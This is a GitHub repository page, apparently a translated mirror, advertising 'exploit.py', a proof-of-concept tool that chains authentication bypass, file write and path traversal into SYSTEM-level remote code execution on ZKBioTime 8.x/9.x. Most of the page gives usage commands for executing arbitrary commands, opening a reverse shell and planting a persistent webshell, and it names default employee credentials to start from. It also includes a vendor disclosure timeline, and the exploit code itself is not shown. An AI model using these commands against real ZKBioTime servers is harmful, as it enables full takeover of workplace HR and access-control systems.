r3m0t3nu11/biotime-CVE-2026-000-Auth-rce

GitHub: r3m0t3nu11/biotime-CVE-2026-000-Auth-rce

描述 ZKBioTime 身份验证绕过与远程代码执行的 PoC 工具及其利用链路。

Stars: 0 | Forks: 0

# ZKBioTime 8.x / 9.x — 身份验证的 RCE & 权限提升 ## 概述 ZKBioTime 是 ZKTeco 推出的一款基于 Web 的人力资源管理平台。Windows 上的 **8.x 和 9.x 版本** 包含四条漏洞链,允许低权限的 **员工账户** 实现完整的 **以 `NT AUTHORITY\SYSTEM` 身份执行远程代码** ## 漏洞概要 | # | 类型 | CVSS v3.1 | | |---|------|----------|-----------| | 1 | 访问控制绕过 | **9.8 严重** | | 2 | 任意文件写入 | 高 | | 3 | 文件包含 / 路径遍历 | 高 | | 4 | 远程代码执行 | **严重** | ## 攻击链 ``` Employee credentials │ ▼ soon.... ``` **入口点:** 员工级凭据(包括应用程序默认凭据) **最终结果:** `NT AUTHORITY\SYSTEM` — 完全主机沦陷 image ## 用法 ``` usage: exploit.py [-h] [--target URL] [-u USERNAME] [-p PASSWORD] [-c COMMAND] [--revshell IP PORT] [--webshell] [--zk-base PATH] [--ssl] ``` ### 单条命令 ``` python3 exploit.py --target http:// -u admin -p password -c whoami ``` ### 反向 Shell ``` python3 exploit.py --target http:// -u admin -p password \ --revshell ``` ### 持久化 Webshell ``` python3 exploit.py --target http:// -u admin -p password \ --webshell # 访问: http:///x/?x= ``` ### 使用员工凭据(自动提权) ``` python3 exploit.py --target http:// -u 1 -p 123456 -c whoami ``` ### 手动指定 ZK_BASE 路径 ``` python3 exploit.py --target http:// --zk-base "C:/ZKBioTime" -c whoami ``` ## 要求 ``` pip install requests urllib3 ``` - Python 3.8+ - 访问 ZKBioTime Web 界面的网络连接 ## 测试环境 | 版本 | 操作系统 | 结果 | |---|---|---| | ZKBioTime 8.x | Windows Server 2019 | 已确认获得 SYSTEM Shell | | ZKBioTime 9.x | Windows Server 2022 | 已确认获得 SYSTEM Shell | ## 披露时间线 | 日期 | 事件 | |---|---| | 2026-04-13 | 漏洞链完全验证 | | 2026-04-13 | 通知厂商(security@zkteco.com) | ## CVE CVE 分配待定 — 已向 ZKTeco / MITRE 请求。 一旦分配 CVE ID,本仓库将进行更新。 ## 免责声明 该工具仅出于 **教育目的和授权安全测试** 而发布。未经授权对非自有系统运行此工具属于违法行为。作者不承担任何滥用责任。 ## 作者 **r3m0t3nu11**
标签:CISA项目, CVE, HTTP工具, LFI, RCE, Web报告查看器, ZKBioTime, 任意文件写入, 协议分析, 员工账户, 命令执行, 持久化WebShell, 数字签名, 权限提升, 横向移动, 漏洞链, 生物识别, 系统沦陷, 编程工具, 编程规范, 考勤系统, 认证绕过, 路径遍历, 远程代码执行, 逆向工具, 门禁系统